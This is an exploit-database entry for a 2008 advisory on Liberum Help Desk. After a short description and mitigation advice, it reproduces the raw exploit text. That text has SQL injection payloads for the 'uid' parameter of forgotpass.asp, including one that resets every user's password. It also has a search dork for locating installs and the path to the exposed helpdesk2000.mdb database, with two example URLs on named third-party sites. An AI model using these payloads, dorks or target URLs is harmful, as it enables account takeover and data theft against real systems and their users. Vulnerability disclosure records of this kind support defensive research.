header-logo
Suggest Exploit
vendor:
Liberum Help Desk
by:
Cold z3ro
7.5
CVSS
HIGH
SQL Injection and Database Disclosure
89, 200
CWE
Product Name: Liberum Help Desk
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Liberum Help Desk (SQL/DD) Multiple Remote Vulnerabilities

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'uid' parameter of the 'forgotpass.asp' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the application's database. Also, the application discloses the database file 'helpdesk2000.mdb' which contains sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Also, the database file should not be accessible from the web.
Source

Exploit-DB raw data:

Liberum Help Desk (SQL/DD) Multiple Remote Vulnerabilities

author : Cold z3ro, www.hackteach.org

Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem"

==============
[#] SQL Injection

http://www.site.com/[path]/forgotpass.asp

    In uid insert SQL command's =>

SCMD ==>    ' or '1=1
SCMD ==>    ' or 'update tblusers set password = "z3ro"


all passwords will be z3ro

=============
[#] Database Disclosure

http://www.site.com/[path]/db/helpdesk2000.mdb



example :
https://www.bauer.uh.edu/helpdesk/db/helpdesk2000.mdb
http://www.ags2.com/helpdesk/db/helpdesk2000.mdb

# milw0rm.com [2008-12-16]

Navigation

Suggest Exploit

Services By CQR